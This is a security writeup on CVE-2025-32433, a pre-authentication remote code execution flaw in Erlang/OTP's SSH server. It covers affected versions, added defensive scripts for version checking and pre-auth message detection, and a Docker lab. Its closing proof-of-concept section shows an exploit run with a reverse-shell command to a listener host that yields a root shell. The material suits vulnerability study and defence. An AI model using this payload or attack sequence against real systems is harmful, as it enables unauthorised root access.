OTP SSH — CVE-2025-32433
Pre-Auth SSH Message Handling RCE
- Affected: Erlang/OTP ≤ 27.3.2 (fixed in 27.3.3)
- Affected: Erlang/OTP ≤ 26.2.5.10 (fixed in 26.2.5.11)
- Affected: Erlang/OTP ≤ 25.3.2.19 (fixed in 25.3.2.20)
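A version check built from the affected ranges above, as an added example (it is not part of this writeup or of the Erlang/OTP project). It parses an OTP release string, compares it with the fixed version of its branch, and separately extracts the version from an Erlang SSH banner of the form shown later on this page. The banner carries the version of the OTP `ssh` application, not the OTP release, so the two numbers are not mapped onto each other here; the fixed versions in `FIXED_VERSIONS` are those listed above, and branches not listed are reported as "unlisted".

```python
"""Compare an Erlang/OTP release against the fixed versions for CVE-2025-32433.

Added example, not the writeup's or the OTP project's code. FIXED_VERSIONS is
taken from the affected ranges above: each branch is fixed in the version that
follows the '<' column. Branches not listed there come back as 'unlisted'.
"""
import re

FIXED_VERSIONS = {
    25: (25, 3, 2, 20),
    26: (26, 2, 5, 11),
    27: (27, 3, 3),
}


def parse_version(text):
    """Turn '26.2.5.10' or 'OTP-26.2.5.10' into a tuple of ints."""
    m = re.search(r"(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def assess(version_text):
    """Return 'vulnerable', 'fixed' or 'unlisted' for an OTP release string."""
    version = parse_version(version_text)
    fixed = FIXED_VERSIONS.get(version[0])
    if fixed is None:
        return "unlisted"
    # Tuple comparison behaves like version comparison for these inputs:
    # (27, 3) < (27, 3, 3) and (26, 2, 5, 10) < (26, 2, 5, 11).
    return "vulnerable" if version < fixed else "fixed"


def erlang_ssh_version_from_banner(banner):
    """Return the ssh application version from an Erlang SSH banner, else None.

    Example banner from this page: 'SSH-2.0-Erlang/5.1.4.7'. That number is the
    version of the OTP 'ssh' application, not the OTP release, so it is only
    useful for inventory and is deliberately not passed to assess().
    """
    m = re.match(r"SSH-\d\.\d-Erlang/([\w.]+)", banner.strip())
    return m.group(1) if m else None


if __name__ == "__main__":
    for sample in ["26.2.5.10", "26.2.5.11", "27.3.2", "OTP-27.3.3", "25.3.2.19", "28.0"]:
        print(f"{sample:>12}: {assess(sample)}")
    print(erlang_ssh_version_from_banner("SSH-2.0-Erlang/5.1.4.7\r\n"))
```

The OTP release string to feed into `assess()` is the one in the `OTP_VERSION` file of the installed release directory, not the SSH banner; the banner only tells you that a host is running Erlang's SSH daemon at all.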
A critical vulnerability in the Erlang/OTP SSH server allows unauthenticated remote code execution. The SSH implementation processes certain message types such as channel_request before authentication is complete — violating RFC 4252 Section 6.
An attacker can establish a TCP connection, send a valid SSH_MSG_KEXINIT, skip authentication entirely, then send a channel_request with exec containing arbitrary Erlang code. The payload reaches Erlang's evaluation path without any credential check.
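A detection check for the ordering described above, added here as an example and not taken from the PoC or from Erlang/OTP: it walks the decoded message types of one SSH connection and reports channel messages from the client that arrive before the server has sent SSH_MSG_USERAUTH_SUCCESS. Connections are modelled as constructed lists of (direction, message number) pairs; the message numbers are the ones assigned by RFC 4253, 4252 and 4254. A packet capture only exposes message types until NEWKEYS is sent in a direction, so the check marks that direction as encrypted and stops inspecting it, which is exactly why a network-side detector works against the sequence the paragraph describes (no key exchange is ever completed) and is blind once a legitimate handshake finishes.

```python
"""Flag SSH channel messages that arrive before authentication completed.

Added example, not the PoC's or the OTP project's code. A connection is a list
of (direction, message_type) pairs, e.g. as decoded from a capture. Message
numbers: RFC 4253 (transport), RFC 4252 (userauth), RFC 4254 (connection).
"""

MSG_NEWKEYS = 21             # after this, the sending direction is encrypted
MSG_USERAUTH_SUCCESS = 52    # sent by the server once authentication succeeds
CHANNEL_MSG_RANGE = range(90, 101)  # CHANNEL_OPEN (90) .. CHANNEL_FAILURE (100)

C2S, S2C = "c2s", "s2c"


def find_pre_auth_channel_messages(messages):
    """Return [(index, message_type), ...] for client channel messages seen
    before the server has sent USERAUTH_SUCCESS.

    Once NEWKEYS is observed in a direction, later packets in that direction
    are encrypted on the wire and their types cannot be read, so they are
    skipped. That is the main caveat of a capture-based check.
    """
    encrypted = {C2S: False, S2C: False}
    authenticated = False
    findings = []
    for index, (direction, mtype) in enumerate(messages):
        if encrypted[direction]:
            continue
        if mtype == MSG_NEWKEYS:
            encrypted[direction] = True
            continue
        if direction == S2C and mtype == MSG_USERAUTH_SUCCESS:
            authenticated = True
        elif direction == C2S and mtype in CHANNEL_MSG_RANGE and not authenticated:
            findings.append((index, mtype))
    return findings


def is_suspicious(messages):
    """True when any client channel message preceded authentication."""
    return bool(find_pre_auth_channel_messages(messages))


# Constructed samples (not real captures).
# A normal session: KEXINIT both ways, KEXDH_INIT/REPLY, NEWKEYS both ways;
# everything after that is encrypted and invisible to this check.
NORMAL_SESSION = [(C2S, 20), (S2C, 20), (C2S, 30), (S2C, 31), (C2S, 21), (S2C, 21),
                  (C2S, 5), (C2S, 50), (S2C, 52), (C2S, 90), (C2S, 98)]

# The ordering described in the text: KEXINIT exchanged, then the client goes
# straight to CHANNEL_OPEN / CHANNEL_REQUEST without NEWKEYS or userauth.
PRE_AUTH_SESSION = [(C2S, 20), (S2C, 20), (C2S, 90), (C2S, 98)]


if __name__ == "__main__":
    for name, session in [("normal", NORMAL_SESSION), ("pre-auth", PRE_AUTH_SESSION)]:
        print(name, find_pre_auth_channel_messages(session), is_suspicious(session))
```

Because a patched server rejects the same messages, this check reports attempts rather than successes; pair it with the version check to decide whether a flagged host could actually have executed the request.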
Build test environment
File(s): ssh_server.erl, Dockerfile
ssh_server.erl starts a vulnerable SSH daemon on port 2222 with password authentication that always rejects credentials. A Dockerfile based on Debian Bookworm builds Erlang/OTP 26.2.5.10 from source, generates RSA keys, and runs the server.
docker build -t erlang-ssh .
docker run -d --name erlang-ssh -p 2222:2222 erlang-ssh
Verify connectivity:
nc 127.0.0.1 2222 -v
Expected response: SSH-2.0-Erlang/5.1.4.7
POC || GTFO
File(s): cve-2025-32433.py
The exploit script bypasses authentication and executes arbitrary shell commands via Erlang code injection. Start a listener, then run the script and enter the reverse shell command when prompted:
kdev :: ~/erlang/CVE-2025-32433 » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] Connecting to SSH server...
[✓] Banner: SSH-2.0-Erlang/5.1.4.7
[*] Sending KEXINIT...
[*] Opening channel...
[?] Shell command: bash -i >& /dev/tcp/172.17.0.1/4488 0>&1
[*] Sending CHANNEL_REQUEST...
[✓] Payload sent.
kdev :: ~ » nc -lvnp 4488
listening on [any] 4488 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 58338
root@cf0f300797ea:~# id && hostname
uid=0(root) gid=0(root) groups=0(root)
cf0f300797ea